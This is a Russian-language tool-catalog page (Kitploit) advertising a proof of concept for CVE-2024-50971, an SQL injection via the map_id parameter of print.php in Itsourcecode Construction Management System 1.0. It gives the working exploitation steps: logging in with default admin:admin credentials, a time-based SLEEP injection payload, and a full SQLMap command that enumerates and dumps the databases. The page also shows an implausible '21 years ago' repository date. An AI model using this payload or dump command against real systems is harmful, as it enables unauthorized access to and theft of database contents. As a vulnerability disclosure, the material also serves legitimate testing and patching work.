Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-50971 — Доказательство концепции для CVE-2024-50971, уязвимости SQL-инъекции в Itsourcecode Construction Management System 1.0, с шагами эксплуатации и командами SQLMap. | Kitploit
Инструменты/GitHubGitHub/akhlak2511/cve-2024-50971
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеБезопасность Баз Данных
GitHubakhlak2511/cve-2024-50971

CVE-2024-50971

Доказательство концепции для CVE-2024-50971, уязвимости SQL-инъекции в Itsourcecode Construction Management System 1.0, с шагами эксплуатации и командами SQLMap.

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-50971

Описание

Уязвимость SQL-инъекции в print.php системы управления строительством Itsourcecode Construction Management System 1.0 позволяет удаленным злоумышленникам выполнять произвольные SQL-команды через параметр map_id.

Тип уязвимости

SQL-инъекция

Производитель продукта

Itsourcecode

База кода затронутого продукта:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

Затронутый компонент:

Система управления строительством Itsourcecode Construction Management System v1.0 уязвима к SQL-инъекции через параметр map_id на странице print.php.

Векторы атаки:

  1. Установите приложение локально, зарегистрируйте учетную запись и войдите с учетными данными администратора admin:admin
  2. Перейдите по следующему URL в вашем браузере:
http://localhost/monitoring_system/print.php?map_id=67
  • Внедрите SQL-полезную нагрузку: Измените параметр map_id в URL, чтобы включить временную SQL-инъекцию (time-based). http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
  • Наблюдайте за ответом приложения: Если инъекция успешна, страница будет загружаться заметно дольше (15 секунд), что подтверждает уязвимость параметра map_id к SQL-инъекции.
  • Теперь используйте инструмент SQLMap для дальнейшей эксплуатации и дампа баз данных с помощью следующей команды: sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
  • Ссылки:

    1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
    2. https://owasp.org/www-community/attacks/SQL_Injection
    Скачать инструмент